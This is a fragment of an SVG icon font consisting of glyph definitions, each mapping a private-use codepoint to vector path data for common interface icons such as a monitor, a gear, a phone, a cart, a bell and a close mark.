<glyph unicode="&#xe65d;" d="M486.31 415.925h-460.62v-17.060h34.12v-307.080h187.66v-42.65h-136.48v-17.060h290.020v17.060h-136.48v42.65h187.66v307.080h34.12v17.060zM435.13 108.845h-358.26v290.020h358.26v-290.020zM230.41 347.685h-102.36v-102.36h102.36v102.36zM213.35 262.385h-68.24v68.24h68.24v-68.24zM264.53 262.385h119.42v-17.060h-119.42v17.060zM264.53 347.685h119.42v-17.060h-119.42v17.060zM264.53 305.035h119.42v-17.060h-119.42v17.060zM128.050 211.205h255.9v-17.060h-255.9v17.060zM128.050 160.025h255.9v-17.060h-255.9v17.060z" />
<glyph unicode="&#xe65e;" d="M477.78 116.825v307.080h-443.56v-307.080h213.25v-32.996l-80.901-44.807 8.263-14.927 81.168 44.966 81.169-44.966 8.263 14.927-80.902 44.807v32.996h213.25zM51.28 406.845h409.44v-272.96h-409.44v272.96zM244.705 233.171l-50.589 70.556-33.853-65.641-53.229 107.408-38.86-143.435 16.46-4.466 27.097 100.003 48.231-97.312 36.536 70.84 54.621-76.171 47.173 158.272-16.344 4.881zM375.429 321.545c-28.222 0-51.189-22.958-51.189-51.18s22.966-51.18 51.189-51.18c28.214 0 51.171 22.958 51.171 51.18s-22.958 51.18-51.171 51.18zM375.429 236.245c-18.818 0-34.129 15.302-34.129 34.12s15.311 34.12 34.129 34.12c18.81 0 34.111-15.302 34.111-34.12s-15.302-34.12-34.111-34.12z" />
<glyph unicode="&#xe65f;" d="M375.42 428.72h-324.14v-409.44h409.44v324.14l-85.3 85.3zM341.3 411.66v-119.42h-170.6v119.42h170.6zM443.66 36.34h-375.32v375.32h85.3v-136.48h204.72v136.48h9.996l75.304-75.304v-300.016zM290.454 377.54h17.060v-51.18h-17.060v51.18zM170.7 155.76h170.6v-17.060h-170.6v17.060zM170.7 104.58h170.6v-17.060h-170.6v17.060z" />
<glyph unicode="&#xe660;" d="M51.28 428.72v-409.44h409.44v409.44h-409.44zM443.66 411.66v-76.77h-375.32v76.77h375.32zM68.34 36.34v281.49h375.32v-281.49h-375.32zM179.222 386.070h25.598v-25.59h-25.598v25.59zM307.18 386.070h25.59v-25.59h-25.59v25.59zM197.564 257.136c-3.057-20.759-12.928-21.117-32.795-21.833l-3.082-0.117v-14.469h33.662v-94.622h17.859v133.774h-15.244l-0.4-2.733zM298.267 216.928c-7.93 0-16.077-2.591-22.533-6.931l6.073 31.279h56.237v16.953h-69.548l-13.57-72.447h15.435l0.942 1.474c5.398 8.405 15.235 13.628 25.69 13.628 17.018 0 29.372-12.587 29.372-29.922 0-15.677-9.839-31.554-28.639-31.554-16.069 0-27.622 10.845-28.097 26.381l-0.1 3.099h-17.843l0.075-3.274c0.574-25.274 18.676-42.25 45.049-42.25 26.59 0 47.415 20.35 47.415 46.324-0.001 28.255-18.468 47.24-45.958 47.24z" />
<glyph unicode="&#xe661;" d="M452.19 437.208c-0.624 0-1.199-0.15-1.816-0.183h-49.364v0.183l-339.384-0.183c-0.617 0.033-1.192 0.183-1.816 0.183-18.843 0-34.12-15.277-34.12-34.12 0-9.479 3.873-18.043 10.112-24.223l75.188-75.188v5.573c0-77.203 60.385-140.145 136.48-144.577v-136.821h-68.24v-17.060h153.54v17.060h-68.24v136.821c76.095 4.431 136.48 67.373 136.48 144.577v-5.573l75.187 75.188c6.24 6.181 10.113 14.744 10.113 24.223 0 18.843-15.277 34.12-34.12 34.12zM110.99 327.801l-63.183 63.184c-3.258 3.232-5.057 7.53-5.057 12.103 0 9.171 7.272 16.677 16.361 17.043 0.525-0.067 1.049-0.116 1.591-0.142l0.467-0.025h49.822v-92.163zM383.95 309.25c0-70.556-57.403-127.95-127.95-127.95s-127.95 57.394-127.95 127.95v110.898h255.9v-110.898zM464.193 390.985l-63.183-63.184v92.164l50.289 0.025c0.542 0.026 1.066 0.075 1.591 0.142 9.089-0.366 16.361-7.871 16.361-17.043-0.001-4.574-1.8-8.872-5.058-12.104z" />
<glyph unicode="&#xe662;" d="M431.923 287.267h68.123l-247.311 146.426-240.781-146.426h61.709v-255.9h-34.12v-17.060h426.5v17.060h-34.12v255.9zM72.847 304.327l180.004 109.474 184.903-109.474h-364.907zM90.723 31.367v255.9h51.18v-255.9h-51.18zM158.963 31.367v255.9h51.18v-255.9h-51.18zM227.203 31.367v255.9h51.18v-255.9h-51.18zM295.443 31.367v255.9h51.18v-255.9h-51.18zM363.683 31.367v255.9h51.18v-255.9h-51.18z" />
<glyph unicode="&#xe663;" d="M401.010 87.587v276.933l31.055 30.946-12.045 12.078-30.105-30.004h-278.824v51.18h-17.060v-51.18h-51.281v-17.060h51.281v-289.953h289.919v-51.247h17.060v51.247h68.24v17.060h-68.24zM372.805 360.48l-261.714-260.874v260.874h261.714zM123.203 87.587l260.747 259.922v-259.923h-260.747z" />
<glyph unicode="&#xe664;" d="M460.72 377.54h-409.44c-14.127 0-25.59-11.463-25.59-25.59v-255.9c0-14.144 11.463-25.59 25.59-25.59h409.44c14.128 0 25.59 11.446 25.59 25.59v255.9c0 14.127-11.462 25.59-25.59 25.59zM42.75 309.3h426.5v-34.12h-426.5v34.12zM469.25 96.050c0-4.707-3.823-8.53-8.53-8.53h-409.44c-4.706 0-8.53 3.823-8.53 8.53v162.070h426.5v-162.070zM42.75 326.36v25.59c0 4.706 3.824 8.53 8.53 8.53h409.44c4.707 0 8.53-3.824 8.53-8.53v-25.59h-426.5zM76.87 138.7h170.6v-17.060h-170.6v17.060zM76.87 189.88h102.36v-17.060h-102.36v17.060zM383.7 121.64h34.637c9.271 0 16.793 7.397 16.793 16.543v1.024c0 9.138-7.522 16.552-16.793 16.552h-34.637c-9.287 0-16.81-7.414-16.81-16.552v-1.024c0-9.146 7.523-16.543 16.81-16.543z" />
<glyph unicode="&#xe665;" d="M445.523 361.835l-86.147 86.147h-189.523v-68.918h-103.376v-379.047h275.67v68.918h103.376v292.9zM359.376 423.618l61.784-61.783h-61.784v61.783zM83.706 17.247v344.588h155.065v-86.147h86.147v-258.441h-241.212zM256 354.7l61.784-61.783h-61.784v61.783zM342.147 86.165v206.753l-86.147 86.147h-68.918v51.688h155.065v-86.147h86.147v-258.441h-86.147z" />
<glyph unicode="&#xe666;" d="M281.59 420.19v-41.576l12.795-3.307c14.478-3.74 28.289-9.554 41.051-17.301l11.446-6.947 29.755 29.754 36.186-36.185-30.213-30.205 6.506-11.329c7.214-12.561 12.612-26.165 16.027-40.425l3.14-13.078h43.909v-51.18h-44.891l-3.457-12.52c-3.732-13.503-9.329-26.457-16.643-38.502l-6.948-11.454 32.571-32.562-36.186-36.185-33.029 33.021-11.32-6.506c-11.746-6.756-24.499-11.921-37.894-15.378l-12.804-3.299v-47.215h-51.18v47.215l-12.804 3.299c-13.395 3.457-26.148 8.622-37.894 15.378l-11.329 6.506-33.020-33.029-36.186 36.194 32.571 32.562-6.948 11.454c-7.314 12.045-12.911 24.999-16.643 38.502l-3.457 12.52h-44.891v51.18h43.909l3.14 13.078c3.415 14.26 8.813 27.864 16.027 40.425l6.506 11.329-30.213 30.205 36.186 36.185 29.755-29.754 11.446 6.947c12.762 7.747 26.573 13.562 41.051 17.301l12.795 3.307v41.575h51.178zM256 147.213c42.334 0 76.77 34.445 76.77 76.787 0 42.333-34.436 76.778-76.77 76.778s-76.77-34.445-76.77-76.778c0-42.342 34.436-76.787 76.77-76.787zM298.65 437.25h-85.3v-45.424c-16.294-4.207-31.605-10.721-45.632-19.234l-32.354 32.353-60.31-60.317 33.038-33.038c-7.972-13.877-13.995-28.964-17.827-44.94h-47.515v-85.3h48.964c4.216-15.253 10.479-29.597 18.502-42.817l-35.162-35.161 60.31-60.326 35.852 35.861c13.062-7.506 27.198-13.253 42.134-17.102v-51.055h85.3v51.055c14.936 3.849 29.072 9.596 42.134 17.102l35.853-35.852 60.31 60.317-35.162 35.161c8.022 13.22 14.286 27.565 18.502 42.817h48.964v85.3h-47.515c-3.832 15.977-9.855 31.063-17.827 44.94l33.038 33.038-60.31 60.317-32.354-32.353c-14.028 8.513-29.338 15.027-45.632 19.234v45.424h-0.001zM256 164.273c-32.987 0-59.71 26.74-59.71 59.727 0 32.986 26.723 59.718 59.71 59.718s59.71-26.731 59.71-59.718c0-32.987-26.723-59.727-59.71-59.727v0z" />
<glyph unicode="&#xe667;" d="M287.871 392.118c6.631 7.513 10.779 17.277 10.779 28.081 0 23.549-19.084 42.641-42.65 42.641-23.557 0-42.65-19.093-42.65-42.641 0-10.804 4.148-20.568 10.779-28.081-97.92-15.311-172.849-100.011-172.849-202.238 0-113.073 91.664-204.72 204.72-204.72s204.72 91.647 204.72 204.72c0 102.218-74.929 186.927-172.849 202.238zM256 445.78c14.111 0 25.59-11.479 25.59-25.581s-11.479-25.582-25.59-25.582-25.59 11.479-25.59 25.581 11.479 25.582 25.59 25.582zM256 2.22c-103.477 0-187.66 84.183-187.66 187.66s84.183 187.66 187.66 187.66 187.66-84.183 187.66-187.66-84.183-187.66-187.66-187.66zM153.682 87.387l138.804 65.741 65.75 138.812-139.263-65.299-65.291-139.254zM227.953 205.599l43.542-43.541-82.21-38.935 38.668 82.476zM283.556 174.119l-43.541 43.541 82.484 38.677-38.943-82.218z" />
<glyph unicode="&#xe668;" d="M426.625 402.876h-341.25c-18.843 0-34.12-15.277-34.12-34.12v-221.896c0-18.843 15.277-34.12 34.12-34.12h239.49l67.615-67.616v67.616h34.146c18.842 0 34.12 15.277 34.12 34.12v221.896c-0.001 18.843-15.279 34.12-34.121 34.12zM443.685 146.86c0-9.405-7.656-17.060-17.060-17.060h-51.205v-43.492l-43.491 43.492h-246.554c-9.404 0-17.060 7.655-17.060 17.060v221.896c0 9.405 7.656 17.060 17.060 17.060h341.25c9.404 0 17.060-7.655 17.060-17.060v-221.896zM256 274.81c-9.421 0-17.060-7.647-17.060-17.060 0-9.421 7.639-17.060 17.060-17.060s17.060 7.639 17.060 17.060c0 9.413-7.639 17.060-17.060 17.060zM324.24 274.81c-9.421 0-17.060-7.647-17.060-17.060 0-9.421 7.639-17.060 17.060-17.060s17.060 7.639 17.060 17.060c0 9.413-7.639 17.060-17.060 17.060zM189.367 274.81c-9.421 0-17.060-7.647-17.060-17.060 0-9.421 7.639-17.060 17.060-17.060s17.060 7.639 17.060 17.060c0 9.413-7.638 17.060-17.060 17.060z" />
<glyph unicode="&#xe669;" d="M383.517 164.29h68.673v136.48h-392.38v-127.95c0-89.507 72.563-162.070 162.070-162.070 86.625 0 157.181 68.023 161.637 153.54zM383.95 283.71h51.18v-102.36h-51.18v102.36zM221.88 27.81c-79.96 0-145.010 65.049-145.010 145.010v110.89h290.020v-110.89c0-79.961-65.050-145.010-145.010-145.010zM59.81-6.31h324.14v17.060h-324.14zM145.11 428.72h17.060v-76.77h-17.060v76.77zM281.59 428.72h17.060v-76.77h-17.060v76.77zM213.35 454.31h17.060v-102.36h-17.060v102.36z" />
<glyph unicode="&#xe66a;" d="M286.301 368.885c63.5 0 115.155-51.647 115.155-115.155 0-0.35-0.042-0.717-0.067-1.066-0.049-0.85-0.108-1.699-0.125-2.566l-0.433-17.41 17.435-0.067c42.2-0.117 76.528-34.553 76.528-76.754 0-42.084-34.262-76.52-76.37-76.737l-3.723-0.016h-312.27c-46.99 0.049-85.225 38.301-85.225 85.283 0 36.403 23.174 68.806 57.653 80.636l9.596 3.281 1.691 9.996c4.181 24.674 25.373 42.583 50.388 42.583 7.972 0 15.677-1.849 22.9-5.481l15.553-7.813 7.505 15.693c19.067 39.853 59.817 65.593 103.809 65.593zM286.301 385.945c-52.613 0-97.912-30.804-119.196-75.287-9.205 4.632-19.567 7.297-30.572 7.297-33.769 0-61.742-24.574-67.207-56.794-40.216-13.795-69.18-51.847-69.18-96.763 0-56.494 45.79-102.293 102.268-102.343l316.102 0.016c51.596 0.267 93.338 42.15 93.338 93.797 0 51.73-41.841 93.664-93.538 93.814 0.033 1.366 0.2 2.682 0.2 4.048 0 73.021-59.194 132.215-132.215 132.215v0z" />
<glyph unicode="&#xe66b;" d="M256 428.72c-113.056 0-204.72-91.664-204.72-204.72 0-113.057 91.664-204.72 204.72-204.72s204.72 91.663 204.72 204.72c0 113.056-91.664 204.72-204.72 204.72zM256 36.34c-103.477 0-187.66 84.183-187.66 187.66 0 103.476 84.183 187.66 187.66 187.66s187.66-84.184 187.66-187.66c0-103.477-84.183-187.66-187.66-187.66zM256 206.94h-102.36v-17.060h119.42v169.9h-17.060z" />
<glyph unicode="&#xe66c;" d="M256 437.25c-117.77 0-213.25-95.471-213.25-213.25s95.48-213.25 213.25-213.25c117.771 0 213.25 95.471 213.25 213.25s-95.479 213.25-213.25 213.25zM256 27.81c-108.183 0-196.19 88.015-196.19 196.19 0 108.174 88.007 196.19 196.19 196.19s196.19-88.016 196.19-196.19c0-108.175-88.007-196.19-196.19-196.19zM362.675 300.137l-136.938-132.79-47.973 47.964c-4.999 4.999-13.095 4.999-18.093 0-4.999-4.998-4.999-13.094 0-18.093l56.877-56.877c2.499-2.499 5.773-3.749 9.047-3.749 3.207 0 6.422 1.199 8.904 3.607l145.985 141.561c5.073 4.923 5.198 13.019 0.283 18.093-4.938 5.082-13.027 5.198-18.092 0.284z" />
<glyph unicode="&#xe66d;" d="M341.3 309.296v127.95h-298.55v-230.31h127.95v-127.95h177.015l68.24-68.231h10.645v68.231h42.65v230.31h-127.95zM59.81 223.996v196.19h264.43v-110.89h-153.54v-85.3h-110.89zM452.19 96.046h-42.65v-54.754l-54.762 54.754h-167.018v196.19h264.43v-196.19z" />
<glyph unicode="&#xe66e;" d="M489.946 326.36h-358.519l-28.946 119.42h-80.427v-17.060h67.015l83.176-343.091c-17.735-5.165-30.771-21.351-30.771-40.759 0-23.55 19.092-42.65 42.65-42.65 23.557 0 42.65 19.1 42.65 42.65 0 9.646-3.324 18.45-8.722 25.59h119.794c-5.398-7.14-8.713-15.944-8.713-25.59 0-23.55 19.084-42.65 42.641-42.65 23.566 0 42.659 19.1 42.659 42.65 0 23.565-19.093 42.641-42.65 42.65v0h-182.453l-8.272 34.12h239.489l69.399 204.72zM209.714 44.87c0-14.111-11.48-25.59-25.59-25.59s-25.59 11.479-25.59 25.59c0 14.11 11.479 25.59 25.59 25.59 14.11 0 25.59-11.48 25.59-25.59zM397.374 44.87c0-14.111-11.48-25.59-25.599-25.59-14.103 0-25.581 11.479-25.581 25.59s11.479 25.59 25.581 25.59c14.119 0 25.599-11.48 25.599-25.59zM176.926 138.7l-41.359 170.6h330.587l-57.834-170.6h-231.394z" />
<glyph unicode="&#xe66f;" d="M435.126 334.89h-70.556l-41.017 41.117c-0.049 0.049-0.091 0.083-0.133 0.133l-0.075 0.067c-6.164 6.097-14.627 9.863-23.982 9.863h-85.3c-9.913 0-18.751-4.282-24.99-11.029l-0.033 0.1-40.168-40.251h-72.006c-18.843 0-34.12-15.278-34.12-34.12v-204.72c0-18.843 15.277-34.12 34.12-34.12h358.26c18.851 0 34.129 15.277 34.129 34.12v204.72c-0.001 18.842-15.278 34.12-34.129 34.12zM452.194 96.050c0-9.397-7.664-17.060-17.069-17.060h-358.259c-9.404 0-17.060 7.663-17.060 17.060v204.72c0 9.413 7.656 17.060 17.060 17.060h79.077l25.656 25.706 0.417-1.25 19.584 21.176c3.315 3.582 7.738 5.548 12.461 5.548h85.3c4.506 0 8.771-1.75 12.112-5.048l46.015-46.132h77.637c9.404 0 17.069-7.647 17.069-17.060v-204.72zM255.996 317.83c-61.243 0-110.89-49.631-110.89-110.874s49.647-110.906 110.89-110.906 110.89 49.663 110.89 110.906-49.647 110.874-110.89 110.874zM255.996 113.11c-51.738 0-93.83 42.1-93.83 93.846 0 51.73 42.092 93.814 93.83 93.814s93.83-42.084 93.83-93.814c0-51.746-42.092-93.846-93.83-93.846zM255.996 283.71c-42.409 0-76.77-34.354-76.77-76.754s34.361-76.786 76.77-76.786 76.77 34.386 76.77 76.786-34.362 76.754-76.77 76.754zM255.996 147.23c-32.921 0-59.71 26.806-59.71 59.726s26.789 59.694 59.71 59.694 59.71-26.773 59.71-59.694-26.79-59.726-59.71-59.726z" />
<glyph unicode="&#xe670;" d="M374.511-6.31c-38.902 0-133.448 49.748-212.85 156.523-74.263 99.869-110.365 172.016-110.365 220.564 0 38.226 26.398 56.469 40.576 66.265l3.499 2.441c15.669 11.203 40.034 14.827 49.372 14.827 16.377 0 23.283-9.588 27.464-17.943 3.548-7.064 32.97-70.247 35.952-78.102 4.574-12.078 3.066-29.68-11.079-39.801l-2.482-1.733c-7.023-4.865-20.084-13.911-21.891-24.907-0.883-5.347 0.908-10.937 5.473-17.093 22.774-30.688 95.488-120.794 108.599-133.031 10.271-9.596 23.283-10.962 32.146-3.49 9.171 7.731 13.245 12.295 13.286 12.345l0.941 0.908c0.775 0.65 7.939 6.331 19.651 6.331 8.446 0 17.043-2.916 25.531-8.655 22.050-14.894 71.797-48.173 71.797-48.173l0.808-0.608c6.364-5.456 15.561-21.166 4.84-41.617-11.112-21.226-45.607-65.051-81.268-65.051zM144.743 437.25c-8.080 0-27.939-3.415-39.46-11.645l-3.707-2.591c-13.228-9.147-33.22-22.958-33.22-52.238 0-44.749 35.003-113.564 106.999-210.385 78.628-105.75 168.509-149.642 199.156-149.642 26.064 0 55.945 36.411 66.157 55.904 6.273 11.97 1.141 18.717-0.633 20.542-5.756 3.856-50.621 33.87-71.247 47.806-5.623 3.806-11.005 5.73-15.985 5.73-4.523 0-7.497-1.607-8.505-2.241-1.666-1.783-6.247-6.473-14.378-13.328-15.218-12.811-38.368-11.271-54.786 4.065-14.77 13.786-89.365 106.658-110.649 135.339-7.364 9.921-10.262 20.026-8.614 30.030 2.991 18.135 19.918 29.855 29.014 36.153l2.266 1.591c8.122 5.806 6.406 16.319 5.057 19.876-2.516 6.623-31.563 69.156-35.244 76.503-3.016 6.016-5.382 8.531-12.221 8.531z" />
<glyph unicode="&#xe671;" d="M136.58 317.83h238.84v68.24h-238.84v-68.24zM153.64 369.010h204.72v-34.12h-204.72v34.12zM375.42 428.72h-238.84c-18.843 0-34.12-15.277-34.12-34.12v-341.2c0-18.843 15.277-34.12 34.12-34.12h238.84c18.843 0 34.12 15.277 34.12 34.12v341.2c0 18.843-15.277 34.12-34.12 34.12zM392.48 53.4c0-9.413-7.655-17.060-17.060-17.060h-238.84c-9.404 0-17.060 7.647-17.060 17.060v341.2c0 9.397 7.656 17.060 17.060 17.060h238.84c9.405 0 17.060-7.663 17.060-17.060v-341.2zM153.64 241.060v51.18h-17.060v-68.24h68.24v17.060h-17.060zM153.64 155.76v51.18h-17.060v-68.24h68.24v17.060h-17.060zM153.64 70.46v51.18h-17.060v-68.24h68.24v17.060h-17.060zM238.94 241.060v51.18h-17.060v-68.24h68.24v17.060h-17.060zM324.24 241.060v51.18h-17.060v-68.24h68.24v17.060h-17.060zM238.94 155.76v51.18h-17.060v-68.24h68.24v17.060h-17.060zM238.94 70.46v51.18h-17.060v-68.24h68.24v17.060h-17.060zM324.24 70.46v136.48h-17.060v-153.54h68.24v17.060h-17.060z" />
<glyph unicode="&#xe672;" d="M42.746 437.25v-426.5h426.508v426.5h-426.508zM452.194 420.19v-68.24h-392.388v68.24h392.388zM59.806 27.81v307.080h392.388v-307.080h-392.388zM153.636 394.6h264.438v-17.060h-264.438v17.060zM85.396 394.6h17.060v-17.060h-17.060v17.060zM119.516 394.6h17.060v-17.060h-17.060v17.060z" />
<glyph unicode="&#xe673;" d="M477.93 383.592l-221.93 81.593-230.31-84.533v-314.278l230.31-83.559 230.31 83.559v314.144l-8.38 3.074zM247.47 4.065l-204.72 74.272v283.947l204.72-74.272v-283.947zM256 303.074l-197.222 71.554 197.222 72.381 197.040-72.447-197.040-71.488zM469.25 78.337l-204.72-74.272v283.948l204.72 73.971v-283.647z" />
<glyph unicode="&#xe674;" d="M460.72 415.925h-409.44v-110.89h17.069v-272.96h375.311v272.96h17.060v110.89zM426.6 49.135h-341.191v255.9h341.191v-255.9zM443.66 322.095h-375.32v76.77h375.32v-76.77zM194.299 194.071h123.818c17.627 0 31.93 13.886 31.93 31.030v6.181c0 17.143-14.303 31.030-31.93 31.030h-123.818c-17.635 0-31.913-13.887-31.913-31.030v-6.181c0.001-17.144 14.278-31.030 31.913-31.030zM179.447 231.281c0 7.705 6.664 13.97 14.853 13.97h123.818c8.197 0 14.87-6.264 14.87-13.97v-6.181c0-7.706-6.672-13.97-14.87-13.97h-123.819c-8.189 0-14.853 6.264-14.853 13.97v6.181z" />
<glyph unicode="&#xe675;" d="M435.155 420.248h-153.54c-10.262 0-19.359-4.623-25.606-11.804-6.264 7.181-15.361 11.804-25.623 11.804h-153.541c-18.843 0-34.12-15.277-34.12-34.12v-290.137c0-18.843 15.277-34.12 34.12-34.12h153.54c0.166 0 0.333 0.050 0.5 0.050 9.079-0.217 16.393-7.539 16.61-16.602v-17.568h17.060v9.463h0.167v7.689c0 9.221 7.363 16.718 16.527 17.010 0.116 0 0.25-0.042 0.366-0.042h153.54c18.843 0 34.12 15.277 34.12 34.12v290.137c0 18.843-15.278 34.12-34.12 34.12zM59.785 95.992v290.136c0 9.404 7.663 17.060 17.060 17.060h153.54c9.413 0 17.060-7.656 17.060-17.060v-290.137c0-9.404-7.647-17.060-17.060-17.060h-153.54c-9.396 0.001-17.060 7.656-17.060 17.061zM452.215 95.992c0-9.404-7.647-17.060-17.060-17.060h-153.54c-9.396 0-17.060 7.656-17.060 17.060v290.136c0 9.404 7.664 17.060 17.060 17.060h153.54c9.413 0 17.060-7.656 17.060-17.060v-290.136z" />
<glyph unicode="&#xe676;" d="M418.070 270.927c-11.795 0-23.040-2.283-33.445-6.264l-41.983 83.026h32.778v17.060h-60.518l17.252-34.12h-147.775l-8.614 17.060h29.055v17.060h-56.777l19.184-37.993c-0.1-0.142-0.233-0.258-0.316-0.408l-36.169-62.959c-11.313 4.84-23.749 7.539-36.811 7.539-51.738 0-93.83-42.092-93.83-93.839 0-51.738 42.092-93.83 93.83-93.83 48.856 0 89.074 37.552 93.398 85.3h69.831c3.040 0 5.847 1.616 7.38 4.249l78.769 135.755 26.015-51.446c-26.981-16.494-45.083-46.149-45.083-80.028 0-51.746 42.092-93.838 93.83-93.838s93.83 42.091 93.83 93.838-42.092 93.838-93.831 93.838zM176.39 308.604l62.101-122.986h-51.163c-2.632 29.047-18.526 54.296-41.584 69.631l30.646 53.355zM170.2 185.619h-64.466l31.496 54.821c17.968-12.329 30.438-32.088 32.97-54.821zM93.93 100.319c-42.334 0-76.77 34.436-76.77 76.77s34.436 76.779 76.77 76.779c9.972 0 19.468-1.966 28.215-5.44l-38.544-67.090c-1.516-2.641-1.508-5.889 0.017-8.521s4.339-4.257 7.38-4.257h79.202c-4.265-38.327-36.826-68.241-76.27-68.241zM255.109 190.559l-62.117 123.010h133.498l-71.381-123.010zM418.070 100.311c-42.334 0-76.77 34.444-76.77 76.778 0 27.231 14.295 51.139 35.737 64.775l36.119-71.439 15.227 7.697-36.011 71.222c8.047 2.875 16.677 4.523 25.698 4.523 42.334 0 76.77-34.445 76.77-76.779s-34.436-76.777-76.77-76.777z" />
<glyph unicode="&#xe677;" d="M401.177 138.004v137.089c0 71.388-51.664 130.599-119.587 142.644v10.896c0 9.421-7.647 17.060-17.060 17.060h-17.060c-9.429 0-17.060-7.639-17.060-17.060v-10.946c-67.79-12.178-119.253-71.322-119.253-142.594v-137.088l-59.877-48.465v-27.656h409.44v27.656l-59.543 48.464zM443.66 78.944h-375.32v2.457l59.877 48.464v145.228c0 70.556 57.394 127.95 127.95 127.95 70.539 0 127.95-57.394 127.95-127.95v-145.202l59.543-48.464v-2.483zM255.984 2.307c23.573 0 42.699 19.076 42.699 42.65h-85.366c0.017-23.574 19.126-42.65 42.667-42.65z" />
<glyph unicode="&#xe678;" d="M0.325 309.616v-171.225c0-13.961 11.321-25.281 25.274-25.281h213.566v221.78h-213.567c-13.952 0-25.273-11.312-25.273-25.274zM222.105 130.17h-196.507c-4.531 0-8.214 3.69-8.214 8.221v171.225c0 4.531 3.682 8.214 8.214 8.214h196.506v-187.66zM511.675 224c0 28.114-22.675 50.922-50.731 51.154v34.462c0 13.961-11.312 25.274-25.274 25.274h-179.445v-17.060h179.446c4.532 0 8.214-3.682 8.214-8.214v-171.225c0-4.531-3.682-8.221-8.214-8.221h-179.446v-17.060h179.446c13.962 0 25.274 11.32 25.274 25.281v34.454c28.056 0.233 50.73 23.032 50.73 51.155zM460.945 189.921v68.157c18.601-0.25 33.671-15.411 33.671-34.078-0.001-18.668-15.070-33.829-33.671-34.079z" />
<glyph unicode="&#xe679;" d="M255.983 437.25c-117.77 0-213.233-95.488-213.233-213.267 0-117.77 95.462-213.233 213.233-213.233s213.267 95.463 213.267 213.233c0 117.779-95.496 213.267-213.267 213.267zM451.973 232.513h-152.99c1.633 58.61 19.975 114.305 53.396 162.27 57.194-32.413 96.595-92.681 99.594-162.27zM255.983 420.19c28.822 0 56.162-6.298 80.835-17.493-34.57-50.397-53.462-108.824-55.062-170.184h-51.513c-1.616 61.36-20.492 119.795-55.079 170.184 24.674 11.204 52.014 17.493 80.819 17.493zM159.621 394.783c33.42-47.948 51.763-103.651 53.395-162.27h-152.989c2.982 69.589 42.4 129.866 99.594 162.27zM60.027 215.453h153.157c-1.633-58.652-19.942-114.405-53.38-162.353-57.295 32.379-96.779 92.697-99.777 162.353zM255.983 27.81c-28.805 0-56.144 6.289-80.818 17.493 34.587 50.38 53.463 108.774 55.079 170.15h51.513c1.6-61.392 20.492-119.77 55.062-170.15-24.675-11.195-52.014-17.493-80.836-17.493zM352.146 53.084c-33.421 47.948-51.713 103.701-53.33 162.369h153.157c-2.999-69.665-42.5-129.99-99.827-162.369z" />
<glyph unicode="&#xe67a;" d="M230.231 352.708v-69.99l16.894-0.166c117.354-1.133 183.462-53.33 200.68-159.105-64.467 74.571-138.805 74.605-200.506 74.622h-17.069v-69.39l-158.145 112.023 158.146 112.006zM247.291 385.712l-204.72-145.010 204.72-145.010v85.317c81.935-0.033 157.897-4.165 222.138-118.721 0 72.755-12.020 235.292-222.138 237.324v86.1z" />
<glyph unicode="&#xe67b;" d="M255.992 424.455l-230.302-400.91h460.62l-230.318 400.91zM255.992 390.202l200.846-349.597h-401.676l200.83 349.597zM247.462 262.385h17.060v-119.42h-17.060v119.42zM255.975 117.375c-7.064 0-12.77-5.73-12.77-12.795 0-7.047 5.707-12.778 12.77-12.778 7.089 0 12.82 5.731 12.82 12.778 0 7.065-5.73 12.795-12.82 12.795z" />
<glyph unicode="&#xe67c;" d="M480.383 87.57l-34.744 70.564-75.329-30.738 6.448-15.794 50.422 20.567c-23.216-67.906-85.958-117.52-160.762-121.061v307.323c33.646 4.206 59.71 32.853 59.71 67.648 0 37.686-30.563 68.231-68.248 68.231-37.677 0-68.232-30.546-68.232-68.231 0-34.795 26.065-63.45 59.71-67.648v-307.322c-74.154 3.515-136.471 52.28-160.162 119.278l46.048-18.784 6.448 15.794-75.329 30.738-34.746-70.565 15.31-7.53 24.415 49.581c25.5-78.761 99.404-135.931 186.544-135.931 85.417 0 158.222 54.879 185.095 131.216l22.091-44.866 15.311 7.53zM206.706 386.079c0 28.214 22.958 51.171 51.172 51.171 28.222 0 51.188-22.958 51.188-51.171 0-28.222-22.965-51.18-51.188-51.18-28.213 0-51.172 22.957-51.172 51.18z" />
<glyph unicode="&#xe67d;" d="M25.69 360.48v-341.2h460.62v341.2h-460.62zM469.25 36.34h-426.5v307.080h426.5v-307.080zM59.81 394.6h392.38v-17.060h-392.38v17.060zM93.93 428.72h324.14v-17.060h-324.14v17.060z" />
<glyph unicode="&#xe67e;" d="M255.875 386.053c-103.66 0-187.66-84.017-187.66-187.66 0-47.032 17.351-89.998 45.949-122.935l-43.9-53.812 13.211-10.779 42.542 52.13c33.712-32.338 79.444-52.246 129.858-52.246 50.53 0 96.362 20.009 130.107 52.496l42.517-52.447 13.261 10.746-43.932 54.195c28.455 32.904 45.707 75.754 45.707 122.652 0 103.643-84.034 187.66-187.66 187.66zM255.875 27.81c-94.072 0-170.6 76.52-170.6 170.583 0 94.080 76.528 170.6 170.6 170.6s170.6-76.52 170.6-170.6c0-94.063-76.528-170.583-170.6-170.583zM178.73 437.25h-50.68c-47.115 0-85.3-38.185-85.3-85.3v-51.33h24.257l111.723 112.356v24.274zM161.67 420.007l-101.86-102.327v34.27c0 37.618 30.613 68.24 68.24 68.24h33.62v-0.183zM383.95 437.25h-50.713v-24.274l111.74-112.356h24.274v51.33c-0.001 47.115-38.203 85.3-85.301 85.3zM452.19 317.68h-0.117l-101.776 102.327v0.183h33.653c37.627 0 68.24-30.622 68.24-68.24v-34.27zM247.47 198.41h-94.047v-17.060h111.107v153.54h-17.060z" />
<glyph unicode="&#xe67f;" d="M460.72 403.13h-409.44v-255.9h138.913l-87.733-102.36h307.080l-87.74 102.36h138.92v255.9zM139.554 61.93l116.438 135.856 116.454-135.856h-232.892zM443.66 164.29h-136.489l-51.18 59.71-51.18-59.71h-136.471v221.78h375.32v-221.78z" />
<glyph unicode="&#xe680;" d="M171.559 320.504l-12.063-12.063 84.442-84.442-84.042-84.043 12.063-12.063 84.042 84.042 84.043-84.042 12.063 12.063-84.042 84.043 84.442 84.442-12.063 12.063-84.443-84.442z" />
